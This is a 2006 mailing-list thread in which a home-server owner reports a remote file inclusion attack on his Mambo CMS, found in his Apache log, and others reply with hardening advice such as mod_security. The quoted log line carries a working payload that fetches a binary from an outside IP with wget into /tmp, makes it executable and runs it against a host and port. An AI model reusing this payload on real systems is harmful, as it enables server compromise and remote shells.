Just a couple of things: Apache configured with mod_rewrite to deny blank or fake referers is a good idea.
Do you have apache configured with mod_security? I highly recommend this last one since you run an php based CMS and can protect from exploits not yet discovered. On Mon, January 23, 2006 2:32 am, Maik Holtkamp said: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Edward Shornock schrieb: >> > On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote: >> > Hi, >> > >> > yesterday morning I found a strange entry in my apache log files >> (debian >> > sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan >> > Server, just serving my Family and some good friends (normally). >> > >> > ---cut--- >> > 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET >> > /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20 >> > 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo| >> > HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT >> 5.1;)" >> > ---cut--- >> > >> > As I patched mambo against recent "register global" attack and my /tmp >> > is mount noexec, the attack doesn't exploit anything. >> > >> > However, I curiously downloaded this sexy executable to have a closer >> look. >> > >> > ---cut--- >> > backup:/home/qmb# ./sexy -h >> > ./sexy <host> <port> >> > ---cut--- >> > >> Never run apps like this as root. Bad bad idea. > > There is an old saying in Germany: > > "Only damage will make you wise" Funny, Don Quixote (when in a good mood) used to say, "Sancho, why experience always comes when is not needed?"* *I am just paraphrasing... -- -JM. Estos días azules y este sol de la infancia (Antonio Machado-1939) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
